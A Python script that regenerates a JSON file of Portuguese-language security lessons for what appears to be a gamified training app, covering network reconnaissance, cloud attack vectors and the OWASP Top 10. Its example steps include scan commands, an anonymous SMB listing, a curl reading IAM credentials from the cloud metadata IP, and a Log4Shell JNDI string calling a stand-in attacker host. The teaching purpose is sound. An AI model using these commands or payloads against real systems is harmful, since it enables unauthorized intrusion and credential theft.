import json
P='/home/gabriel/Documentos/dev/cyberduo/scripts/lesson_definitions.json'
with open(P,'r') as f: L=json.load(f)

# Expand 3.2 (Reconhecimento Ativo) -> 3.2a, 3.2b
L = [l for l in L if l['filename'] != '3.2-reconhecimento-ativo.html']
L.extend([
{"filename":"3.2a-recon-ativo-rede.html","module":"3","title":"Recon Ativo de Rede 3.2a","victory_msg":"VARREDURA DOMINADA!","steps":[
{"type":"teach","icon":"fa-satellite-dish","title":"Reconhecimento Ativo","content":"Ao contrário do OSINT, no recon ativo <b>enviamos pacotes diretamente ao alvo</b>. Deixa rastros em firewalls e IDS/IPS. Objetivos: descobrir IPs vivos, portas abertas e serviços.","highlight":"Recon ativo = interação direta com o alvo"},
{"type":"teach","icon":"fa-network-wired","title":"Ping Sweeps e Port Scans","content":"<b>Ping Sweep</b> (ex: nmap -sn) descobre quais IPs estão online. <b>Port Scan</b> descobre quais portas TCP/UDP estão abertas. TCP Connect (completo) vs TCP SYN (stealth).","highlight":"Ping Sweep = mapa da rede. Port Scan = mapa do host."},
{"type":"example","icon":"fa-terminal","title":"TCP SYN Scan vs Connect","scenario":"O pentester escolhe o SYN scan para ser mais discreto, enviando apenas o primeiro pacote do handshake (SYN).","code":"# TCP SYN Scan (Stealth, requer root)\nnmap -sS 192.168.1.100\n\n# TCP Connect Scan (Completo, sem root)\nnmap -sT 192.168.1.100","takeaway":"SYN Scan interrompe o handshake, gerando menos logs no servidor alvo."},
{"type":"quiz","task":"Qual tipo de scan interrompe o handshake TCP antes de completar, gerando menos logs na aplicação alvo?","options":["TCP SYN Scan","TCP Connect Scan","UDP Scan"],"correctText":"TCP SYN Scan","explanation":"O SYN scan (half-open) envia SYN, recebe SYN/ACK e responde com RST, interrompendo a conexão."},
{"type":"teach","icon":"fa-fingerprint","title":"Service & OS Fingerprinting","content":"Descobrir que a porta 80 está aberta não basta. Precisamos saber <b>qual serviço</b> (Apache, Nginx) e <b>qual versão</b> está rodando. Nmap faz isso com -sV e adivinha o SO com -O.","highlight":"Saber a versão exata = encontrar exploits exatos"},
{"type":"fill","sentence":"Para que o Nmap tente identificar a versão exata dos serviços rodando nas portas abertas, usamos a flag ___.","options":["-sV","-sn","-O"],"correctText":"-sV","explanation":"-sV (Service Version) analisa os banners e respostas dos serviços para identificar o software e versão."}
]},
{"filename":"3.2b-enumeracao-servicos.html","module":"3","title":"Enumeração de Serviços 3.2b","victory_msg":"ENUMERAÇÃO DOMINADA!","steps":[
{"type":"teach","icon":"fa-folder-open","title":"Enumeração SMB e RPC","content":"<b>SMB</b> (porta 445/139) é essencial no Windows. Pode revelar pastas compartilhadas, usuários, políticas de senha e domínios. Ferramentas: <b>enum4linux</b>, <b>smbclient</b>, <b>crackmapexec</b>.","highlight":"SMB = mina de ouro em redes Windows"},
{"type":"example","icon":"fa-terminal","title":"Listando Shares Nulos","scenario":"Um share mal configurado permite acesso anônimo (Null Session) para listar diretórios.","code":"smbclient -L \\\\192.168.1.100 -N","takeaway":"-N instrui o smbclient a não usar senha (Null Session)."},
{"type":"teach","icon":"fa-walkie-talkie","title":"SNMP Walking","content":"<b>SNMP</b> (porta 161 UDP) monitora dispositivos de rede. Se a 'community string' pública for padrão ('public' ou 'private'), um atacante pode extrair routing tables, processos e interfaces usando <b>snmpwalk</b>.","highlight":"SNMP revela configurações internas de roteadores e switches"},
{"type":"quiz","task":"Qual protocolo de rede, frequentemente executado na porta UDP 161, pode vazar informações críticas do sistema se usar a community string 'public'?","options":["SNMP","SMB","DNS"],"correctText":"SNMP","explanation":"SNMP (Simple Network Management Protocol) é usado para monitoramento e controle de dispositivos de rede."},
{"type":"teach","icon":"fa-envelope","title":"Enumeração SMTP","content":"Servidores de e-mail (SMTP - porta 25) podem confirmar se um usuário existe usando os comandos <b>VRFY</b> (Verify) e <b>EXPN</b> (Expand). Ferramenta: <b>smtp-user-enum</b>.","highlight":"VRFY permite descobrir usuários válidos antes de tentar senhas"},
{"type":"match","title":"Serviço → Protocolo/Porta","pairs":[{"term":"SMB","definition":"TCP 445 / 139 (Compartilhamento)"},{"term":"SNMP","definition":"UDP 161 (Monitoramento)"},{"term":"SMTP","definition":"TCP 25 (E-mail)"},{"term":"DNS","definition":"UDP/TCP 53 (Nomes)"}]}
]}
])

# Expand 7.1 Cloud (7 -> 12 steps)
L = [l for l in L if l['filename'] != '7.1-vetores-nuvem.html']
L.extend([
{"filename":"7.1a-vetores-nuvem.html","module":"7","title":"Vetores na Nuvem 7.1a","victory_msg":"CLOUD SECURITY INICIADA!","steps":[
{"type":"teach","icon":"fa-cloud","title":"Nuvem: Modelo de Responsabilidade","content":"A segurança na nuvem é <b>compartilhada</b>. O provedor (AWS, Azure) protege a <i>infraestrutura da nuvem</i>. O cliente protege o que coloca <i>dentro da nuvem</i> (dados, IAM, SO).","highlight":"O provedor não vai consertar o seu S3 aberto"},
{"type":"teach","icon":"fa-folder-open","title":"Storage Misconfigurations","content":"Buckets S3 (AWS) ou Blobs (Azure) abertos ao público são a causa #1 de vazamentos na nuvem. Um bucket configurado sem restrições de acesso lista todo o seu conteúdo.","highlight":"S3 bucket público = desastre iminente"},
{"type":"quiz","task":"No modelo de responsabilidade compartilhada da nuvem (IaaS), quem é responsável por garantir que um bucket S3 não seja público?","options":["O Cliente","O Provedor da Nuvem","O Auditor"],"correctText":"O Cliente","explanation":"A configuração de acesso e permissões aos dados criados (como S3) é responsabilidade do cliente."},
{"type":"teach","icon":"fa-key","title":"Gerenciamento de Identidade (IAM)","content":"Na nuvem, <b>IAM é o novo perímetro</b>. Permissões excessivas (Over-privileged) permitem que um atacante que comprometa uma aplicação web ganhe controle de toda a conta AWS.","highlight":"Least Privilege é crucial no IAM"},
{"type":"teach","icon":"fa-server","title":"Metadata Service (IMDS)","content":"Instâncias na nuvem podem acessar metadados internos via um IP especial (ex: <b>169.254.169.254</b>). Se a aplicação tiver uma falha <b>SSRF</b>, o atacante acessa esse IP e rouba credenciais temporárias do IAM da instância.","highlight":"SSRF + IMDS = chaves da conta AWS"},
{"type":"example","icon":"fa-terminal","title":"Roubando Credenciais via IMDS","scenario":"Atacante usa uma vulnerabilidade na aplicação web (SSRF) para forçar o servidor a ler suas próprias credenciais temporárias.","code":"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name","takeaway":"O IMDSv2 adiciona autenticação por token para mitigar isso."}
]},
{"filename":"7.1b-cloud-exploits.html","module":"7","title":"Exploração e Enumeração Cloud 7.1b","victory_msg":"CLOUD EXPLOITATION DOMINADA!","steps":[
{"type":"teach","icon":"fa-bolt","title":"Serverless (Lambda/Functions)","content":"Funções Serverless executam código sob demanda, sem servidor fixo. Falhas comuns: <b>Event Injection</b>, <b>dependências vulneráveis</b>, permissões IAM excessivas e vazamento de segredos em variáveis de ambiente.","highlight":"Sem servidor != Sem vulnerabilidades"},
{"type":"teach","icon":"fa-magnifying-glass","title":"Cloud Enumeration","content":"Ferramentas como <b>ScoutSuite</b> e <b>Prowler</b> auditam a nuvem, mas para ataques, usamos <b>Pacu</b>. Ele enumera permissões (WhoAmI), encontra buckets abertos e tenta escalar privilégios (ex: criar um usuário admin).","highlight":"Pacu = Metasploit para AWS"},
{"type":"match","title":"Termo Cloud → Definição","pairs":[{"term":"IAM","definition":"Gerenciamento de Identidade e Acesso"},{"term":"IMDS","definition":"Serviço de metadados da instância"},{"term":"Serverless","definition":"Execução de código sem gerenciar servidor"},{"term":"S3 / Blob","definition":"Armazenamento de objetos"}]},
{"type":"fill","sentence":"O IP de endereço de link local padrão usado para acessar o Instance Metadata Service (IMDS) em nuvens públicas é ___.","options":["169.254.169.254","192.168.1.1","127.0.0.1"],"correctText":"169.254.169.254","explanation":"Este IP especial roteia o tráfego de dentro da instância para o hypervisor da nuvem para entregar metadados e credenciais temporárias."}
]}
])

# Expand 6.1 OWASP Top 10 (5 -> 12 steps)
L = [l for l in L if l['filename'] != '6.1-owasp-top10.html']
L.extend([
{"filename":"6.1a-owasp-top10-1.html","module":"6","title":"OWASP Top 10 (Parte 1) 6.1a","victory_msg":"OWASP PARTE 1 DOMINADO!","steps":[
{"type":"teach","icon":"fa-list","title":"O que é a OWASP?","content":"A <b>OWASP</b> (Open Web Application Security Project) é uma fundação sem fins lucrativos. O <b>OWASP Top 10</b> é um documento de conscientização que lista os 10 riscos de segurança mais críticos para aplicações web.","highlight":"OWASP Top 10 = guia de sobrevivência em AppSec"},
{"type":"teach","icon":"fa-key","title":"A01: Quebra de Controle de Acesso","content":"Ocorre quando usuários conseguem acessar dados ou executar ações que não deveriam. Exemplos: acessar URL admin sem estar logado, alterar ID na URL para ver conta de outra pessoa (<b>IDOR</b>).","highlight":"Autorização falha = caos"},
{"type":"example","icon":"fa-user-secret","title":"IDOR na Prática","scenario":"O usuário está logado como ID 10. Ele altera a URL para acessar os dados do ID 11.","code":"URL original: http://alvo.com/perfil?id=10\nAtacante muda para: http://alvo.com/perfil?id=11\n(Se a aplicação não verificar permissão, ele verá dados de outros)","takeaway":"IDOR (Insecure Direct Object Reference) é uma falha clássica de A01."},
{"type":"teach","icon":"fa-lock","title":"A02: Falhas Criptográficas","content":"Falta de criptografia ou uso de algoritmos fracos/antigos (MD5, SHA1). Leva à exposição de dados sensíveis (senhas, cartões). Exemplos: tráfego HTTP em vez de HTTPS, senhas não hasheadas no banco.","highlight":"MD5 e SHA1 estão obsoletos"},
{"type":"quiz","task":"Qual categoria do OWASP Top 10 inclui a vulnerabilidade IDOR (Insecure Direct Object Reference)?","options":["A01: Quebra de Controle de Acesso","A02: Falhas Criptográficas","A03: Injeção"],"correctText":"A01: Quebra de Controle de Acesso","explanation":"IDOR ocorre quando o sistema não verifica adequadamente se o usuário tem autorização para acessar o recurso solicitado pelo ID."},
{"type":"teach","icon":"fa-syringe","title":"A03: Injeção","content":"Dados não confiáveis do usuário são enviados a um interpretador como parte de um comando. O interpretador é 'enganado' e executa comandos não intencionais. Exemplos: <b>SQL Injection</b>, <b>OS Command Injection</b>.","highlight":"Valide e sanitize todas as entradas"},
{"type":"fill","sentence":"A categoria OWASP que lida com dados sendo enviados como comandos para interpretadores, como em SQLi, é a A03: ___.","options":["Injeção","Design Inseguro","Desconfiguração"],"correctText":"Injeção","explanation":"Injeções ocorrem quando a entrada do usuário altera a sintaxe e a lógica do comando subjacente."}
]},
{"filename":"6.1b-owasp-top10-2.html","module":"6","title":"OWASP Top 10 (Parte 2) 6.1b","victory_msg":"OWASP PARTE 2 DOMINADO!","steps":[
{"type":"teach","icon":"fa-pen-ruler","title":"A04: Design Inseguro","content":"Vulnerabilidades decorrentes de falhas na arquitetura e no modelo de ameaça. Não podem ser corrigidas por código seguro se o <i>design</i> original já é falho (ex: perguntas de recuperação de senha fáceis de adivinhar).","highlight":"Design inseguro não tem patch de código"},
{"type":"teach","icon":"fa-sliders","title":"A05: Configuração de Segurança Incorreta","content":"Sistemas mantidos com configurações padrão, diretórios abertos, mensagens de erro detalhadas (stack traces) expostas, ou serviços desnecessários habilitados.","highlight":"Remova padrões e feche o que não usa"},
{"type":"teach","icon":"fa-box-open","title":"A06: Componentes Vulneráveis e Desatualizados","content":"Usar bibliotecas de terceiros, frameworks ou servidores web que possuem falhas conhecidas (CVEs). A aplicação herda as vulnerabilidades das suas dependências.","highlight":"A maioria do código nas aplicações web vem de terceiros"},
{"type":"example","icon":"fa-terminal","title":"Falha Log4j (Componente Vulnerável)","scenario":"A biblioteca Java Log4j tinha uma vulnerabilidade RCE crítica (Log4Shell). Milhões de aplicações que usavam Log4j sem atualizar foram comprometidas.","code":"O atacante envia uma string especial no header User-Agent: \n${jndi:ldap://atacante.com/exploit}","takeaway":"Mantenha dependências atualizadas sempre!"},
{"type":"quiz","task":"Uma aplicação web que exibe mensagens de erro com stack trace do banco de dados na tela do usuário sofre de qual falha do OWASP Top 10?","options":["A05: Configuração de Segurança Incorreta","A01: Quebra de Controle de Acesso","A03: Injeção"],"correctText":"A05: Configuração de Segurança Incorreta","explanation":"A exposição de erros detalhados ajuda os atacantes a mapear o backend e é uma falha de configuração."},
{"type":"teach","icon":"fa-id-badge","title":"A07: Falhas de Identificação e Autenticação","content":"Antigamente 'Broken Authentication'. Envolve falhas no login: permitir senhas fracas, ausência de MFA, não invalidar sessões após o logout, exposição do ID de sessão.","highlight":"Autenticação falha = roubo de contas"},
{"type":"match","title":"OWASP → Descrição","pairs":[{"term":"A01 Controle de Acesso","definition":"Usuário faz o que não deve"},{"term":"A02 Falhas Criptográficas","definition":"Dados em trânsito/repouso sem proteção"},{"term":"A03 Injeção","definition":"Input executado como comando"},{"term":"A06 Componentes Vulneráveis","definition":"Uso de bibliotecas com CVEs conhecidos"}]}
]}
])

with open(P,'w') as f: json.dump(L,f,ensure_ascii=False,indent=2)
print(f"✅ {len(L)} lessons (expanded 3.2, 7.1, 6.1)")
